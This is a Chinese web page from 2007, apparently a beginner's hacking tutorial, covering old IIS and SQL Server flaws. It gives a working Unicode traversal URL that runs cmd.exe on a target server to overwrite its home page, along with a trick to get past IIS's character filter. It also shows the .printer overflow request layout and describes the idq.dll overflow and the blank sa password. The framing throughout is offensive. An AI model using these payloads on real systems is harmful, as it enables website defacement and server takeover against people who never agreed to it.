当前位置：清风网络学院 → 网络技术 → 黑客技术 → 从零开始学黑客：网络黑客新手入门指南


	精品推荐


特别推荐


热点TOP10

从零开始学黑客：网络黑客新手入门指南

日期：2007年10月23日作者：查看:[大字体中字体小字体]

　　
　　2.b.利用Unicode漏洞我们还可以简单的修改目标主机的WEB文件。一般情况下，我们要修改目标主机的web文件，常用到的方法是利用echo回显、管道工具“>” “>>”。如果你对这些命令不熟悉，可以键入以下命令以查看帮助文档，如：
　　C:\>echo/?
　　显示信息，或将命令响应打开或关上。
　　ECHO [ON OFF]
　　ECHO [message]
　　仅键入 ECHO 而不加参数，可以显示当前的 ECHO 设置。
　　
　　
　　管道工具“>” “>>” 的不同之处
　　“>”“>>”是将命令产生的输出重新定向,比如写到某个文件或输出到打印机中。
　　“>>”将产生的内容追加进文件中，“>”则将原文件内容覆盖。
　　
　　IIS加载程序检测到有cmd.exe或者command.com串就要检测特殊字符“&(,;%<>”。如果发现有这些字符就会返回500错误，所以不能直接使用cmd.exe加管道符等。如果我们输入：http://x.x.x.x/scripts/..%c0%af../winnt/system32/cmd.exe?/c+echo+内容+> d:\cnhack.bat
　　我们可以看到提示:
　　
　　HTTP 500 - 内部服务器错误
　　Internet Explorer
　　
　　所以我们如果要echo和>的结合使用，就应该这样输入: http://x.x.x.x/scripts/..%c0%af../winnt/system32/cmd".exe?/c+echo+Hacked By Nature+> c:\inetpub\wwwroot\index.html (注意：这两个命令的区别是，后一个比前一个在cmd后多了一个"符号)，完成后看它的主页已经被修改成了：Hacked By Nature 了。其实只要我们弄懂这个漏洞的使用，仅仅使用IE，我们就可以“黑”掉一个网站咯！就这么简单！
　　
　　3.idq.dll缓冲区溢出漏洞。作为安装过程的一部分，IIS 安装了几个 ISAPI 扩展 .dlls 。其中的 idq.dll 存在问题，它是 Index Server 的一个组件，对管理员脚本(.ida文件)和Internet数据查询 (.idq文件）提供支持。但是，idq.dll 在处理一段URL输入的代码中存在一个未经检查的缓冲区。攻击者利用此漏洞能导致受影响服务器产生缓冲区溢出，从而执行自己提供的代码。而更为严重的是，idq.dll 是以 SYSTEM 身份运行的，攻击者成功利用此漏洞后能取得系统管理员权限。(SYSTEM权限相当于超级管理员权限，很值得注意！)Windows 2k和NT都受到了不同程度的影响。
　　
　　4.IIS.printer漏洞（应用程序映射缓冲溢出）：这也是近期比较流行的漏洞，国内国外仍有N台机器存在此漏洞。
　　微软Windows 2000 IIS 5的打印ISAPI扩展接口建立了.printer扩展名到msw3prt.dll的映射关系，缺省情况下该映射存在。当远程用户提交对.printer的URL请求时，IIS 5调用msw3prt.dll解释该请求。由于msw3prt.dll缺乏足够的缓冲区边界检查，远程用户可以提交一个精心构造的针对.printer的URL请求，其"Host:"域包含大约420字节的数据，此时在msw3prt.dll中发生典型的缓冲区溢出，潜在允许执行任意代码。溢出发生后，WEB服务停止响应，Win 2K可以检查到WEB服务停止响应，从而自动重启它，因此系统管理员很难意识到发生过攻击。默认情况下，IIS 5.0服务器存在一个后缀为"printer"的应用程序映射，这个映射使用位于\WINNT\System32\下的名为 msw3prt.dll 的动态库文件。这个功能是用于基于Web控制的网络打印的，是Windows2000为Internet Printing Protocol(IPP)协议而设置的应用程序功能。不幸的是，这个映射存在一个缓冲区溢出错误，可以导致inetinfo.exe出错，允许黑客通过web获取服务器的管理权限，黑客制造一个 .printer 的ISAPI请求，当Http host参数的值达到420个字符时，就会发生缓冲区溢出：
　　
　　
　　GET /NULL.printer HTTP/1.0
　　Host: [buffer] <---------------------------------当上述 [buffer]值的字符数目达到420时，缓冲区溢出。这时,Web服务器会停止响应
　　
　　Windows2000操作系统发现Web异常停止后，会自动重启。通过构造包含适当的Shell Code的脚本，黑客可以以system用户的身份，不停地远程通过web执行任何指令。这个漏洞的危害比IISHACK更大，原因是由于IIS4.0不自动重启的原因，用IIShack黑客只能获得一次Shell，而通过这个漏洞，黑客可以不停地利用。目前Internet上已经有了针对这个漏洞的exploit程序，可以绑定系统的cmd.exe程序，从而自由地执行指令。
　　
　　5.MSSQL空密码漏洞：SQL服务器是一个非常强大的数据库。当然，这么庞大的程序漏洞也不少。超级管理员sa的默认密码为空，就是一个重大漏洞。SQL Server是运行于NT平台上的数据库，通常采用IIS作为网络服务器的NT服务器均采用SQL服务器作为数据库服务器。SQL服务器目前最高的版本是2000，但是通常比较常见的是6.5和7.0（包括SP1）。SQL服务器如果配置不当，将对NT系统本身造成很大的危害，在一般情况下都可以直接获得超级用户的权限。SQL 2000以前的版本在默认安装时的密码均为空，如果在安装的时候没有及时修改密码，无疑是为Windows NT系统打开了一道后门。

上一篇:入侵检测系统的优点和缺点深入分析

下一篇:SAN是怎么利用phpnuke的漏洞做坏事的

·请问网络路由器的接口种类有哪些？

·最详细的黑客入门法则

·“黑客”教你如何远程控制计算机

·新手成长必修课主板BIOS的44招密技大全

·微软.NET战略延深蓄谋打造下一代网络门户

·大智慧股票软件Level-2入门手册

	\| 帮助(？) \| 版权声明 \| 友情连接 \| 关于我们 \| 信息发布
Copyright 2007 www.viphot.com All Rights Reserved.	鄂ICP备05000083号Powered by:viphot